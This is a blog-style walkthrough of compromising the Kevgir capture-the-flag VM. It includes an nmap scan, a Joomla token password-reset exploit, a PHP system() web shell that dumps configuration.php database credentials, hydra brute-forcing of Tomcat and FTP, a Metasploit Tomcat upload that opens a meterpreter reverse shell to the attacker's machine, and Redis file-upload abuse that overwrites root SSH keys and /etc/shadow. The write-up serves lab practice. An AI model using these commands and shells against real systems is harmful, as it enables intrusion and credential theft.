czwartek, 17 marca 2016

Kevgir VM WriteUp

https://canyoupwn.me/kevgir-vulnerable-vm/ - Kevgir VM download

1) jenkins
2) joomla
3) bruteforce (ftp,tomcat)
4) tomcat
5) redis




nmap -p- -T4 -sS -O 10.0.1.3

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-17 11:34 CET
Nmap scan report for 10.0.1.3
Host is up (0.0012s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1322/tcp  open  novation
2049/tcp  open  nfs
6379/tcp  open  unknown
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap
9000/tcp  open  cslistener
32938/tcp open  unknown
41511/tcp open  unknown
42149/tcp open  unknown
46990/tcp open  unknown
48201/tcp open  unknown
52526/tcp open  unknown
59559/tcp open  unknown
MAC Address: 08:00:27:F8:A1:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds


1)
http://10.0.1.3:8081/

http://10.0.1.3:8081/index2.php <= <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> - index2.php discovered via dirbuster

I used exploit -  (Token) Remote Admin Change Password Vulnerability
https://www.exploit-db.com/exploits/6234/

10.0.1.3:8081/index.php?option=com_user&view=reset&layout=confirm
 1) Write into field "token" char ' and Click OK.
 2) Write new password for admin
 3) 10.0.1.3:8081/administrator
 4) Login admin:new_pass

 i have access to admin panel - http://10.0.1.3:8081/administrator/index.php


 After install new extension directphp  because I want to add my PHP code to article.

 <?php system($_GET[i]);?>

 http://10.0.1.3:8081/?i=cat%20configuration.php
 lease check back again soon.'; var $sitename = 'CanYou PwnMe'; var $editor = 'tinymce'; var $list_limit = '20'; var $legacy = '0'; /* Debug Settings */ var $debug = '0'; var $debug_lang = '0'; /* Database Settings */ var $dbtype = 'mysql'; var $host = 'localhost'; var $user = 'joomlauser'; var $password = '1m4dm1n!'; var $db = 'joomla'; var $dbprefix = 'jos_'; /* Server Settings */ var $live_site = ''; var $secret = 'phn4U0DCRrlLzM5M'; var $gzip = '0'; var $error_reporting = '-1'; var $helpurl = 'http://help.joomla.org'; var $xmlrpc_server = '0'; var $ftp_host = '127.0.0.1'; var $ftp_port = '21'; var $ftp_user = ''; var $ftp_pass = ''; var $ftp_root = ''; var $ftp_enable = '0'; /* Locale Settings */ var $offset = '0'; var $offset_user = '0'; /* Mail Settings */ var $mailer = 'mail'; var $mailfrom = ' admin@joomla.org'; var $fromname = 'CanYou PwnMe'; var $sendmail = '/usr/sbin/sendmail'; var $smtpauth = '0'; var $smtpuser = ''; var $smtppass = ''; var $smtphost = 'localhost'; /* Cache Settings */ var $caching = '0'; var $cachetime = '15'; var $cache_handler = 'file'; /* Meta Settings */ var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system'; var $MetaKeys = 'joomla, Joomla'; var $MetaTitle = '1'; var $MetaAuthor = '1'; /* SEO Settings */ var $sef = '0'; var $sef_rewrite = '0'; var $sef_suffix = '0'; /* Feed Settings */ var $feed_limit = 10; var $log_path = '/var/www/html/gentleman/logs'; var $tmp_path = '/var/www/html/gentleman/tmp'; /* Session Setting */ var $lifetime = '15'; var $session_handler = 'database'; } ?>  




 2) Cracking tomcat manager
 hydra -l tomcat -P /usr/share/wordlists/rockyou.txt -e ns -s 8080 -vV 10.0.1.3 http-get /manager/html

 [8080][http-get] host: 10.0.1.3   login: tomcat   password: tomcat

 next used metasploit:
Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   tomcat           no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.0.1.3         yes       The target address
   RPORT      8080             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME   tomcat           no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.1.2         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.0.1.2:4444
[*] 10.0.1.3:8080 - Retrieving session ID and CSRF token...
[*] 10.0.1.3:8080 - Uploading and deploying ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Executing ltKnITWSrBQ5ioDn...
[*] 10.0.1.3:8080 - Undeploying ltKnITWSrBQ5ioDn ...
[*] Sending stage (46089 bytes) to 10.0.1.3
[*] Meterpreter session 2 opened (10.0.1.2:4444 -> 10.0.1.3:39544) at 2016-03-16 10:46:20 +0100

meterpreter >

meterpreter > shell
Process 1 created.
Channel 1 created.

ls
common
conf
logs
server
shared
webapps
work
uname -a
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux



3) crack password FTP
hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -e s -s 25  10.0.1.3 ftp
[25][ftp] host: 10.0.1.3   login: admin   password: admin

4) redis hacking
root@kali:~# redis-cli -h 10.0.1.3
10.0.1.3:6379> INFO
# Server
redis_version:3.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:aa70bcb321ba8313
redis_mode:standalone
os:Linux 3.19.0-25-generic i686
arch_bits:32
multiplexing_api:epoll
gcc_version:4.8.4
process_id:1215
run_id:f77a1654a20f1a67cadbe83761f0bd907ce01e0e
tcp_port:6379
uptime_in_seconds:4070
uptime_in_days:0
hz:10
lru_clock:15370196
config_file:/etc/redis/6379.conf

# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:659136
used_memory_human:643.69K
used_memory_rss:9306112
used_memory_peak:687064
used_memory_peak_human:670.96K
used_memory_lua:24576
mem_fragmentation_ratio:14.12
mem_allocator:jemalloc-3.6.0

# Persistence
loading:0
rdb_changes_since_last_save:1
rdb_bgsave_in_progress:0
rdb_last_save_time:1458210485
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:21
total_commands_processed:74
instantaneous_ops_per_sec:0
total_net_input_bytes:6574
total_net_output_bytes:22122
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:14331
migrate_cached_sockets:0

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:34.07
used_cpu_user:0.28
used_cpu_sys_children:0.02
used_cpu_user_children:0.00

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=2,expires=0,avg_ttl=0
10.0.1.3:6379>


(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"

Module options (auxiliary/scanner/redis/file_upload):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DISABLE_RDBCOMPRESSION  true             yes       Disable compression when saving if found to be enabled
   LocalFile                                no        Local file to be uploaded
   Password                foobared         no        Redis password for authentication test
   RHOSTS                                   yes       The target address range or CIDR identifier
   RPORT                   6379             yes       The target port
   RemoteFile                               no        Remote file path
   THREADS                 1                yes       The number of concurrent threads

msf auxiliary(file_upload) > set RHOSTS 10.0.1.3
RHOSTS => 10.0.1.3
msf auxiliary(file_upload) > exploit

[-] Auxiliary failed: RuntimeError bad-config: LocalFile must be set
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/redis/file_upload.rb:150:in `run_host'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:121:in `block (2 levels) in run'
[-]   /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /root/.ssh/foo.txt
LocalFile => /root/.ssh/foo.txt
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/authorized_keys
RemoteFile => /root/.ssh/authorized_keys
msf auxiliary(file_upload) > exploit

[-] 10.0.1.3:6379         - 10.0.1.3:6379         -- failed to save 392 bytes to /root/.ssh/authorized_keys (permissions?)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /root/.ssh/id_rsa
RemoteFile => /root/.ssh/id_rsa
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379         - 10.0.1.3:6379         -- saved 392 bytes inside of redis DB at /root/.ssh/id_rsa
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379         - 10.0.1.3:6379         -- saved 392 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) > set LocalFile /etc/shadow
LocalFile => /etc/shadow
msf auxiliary(file_upload) > set RemoteFile /etc/shadow
RemoteFile => /etc/shadow
msf auxiliary(file_upload) > exploit

[+] 10.0.1.3:6379         - 10.0.1.3:6379         -- saved 1664 bytes inside of redis DB at /etc/shadow
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(file_upload) >


DONE
 i logged in to VM on root.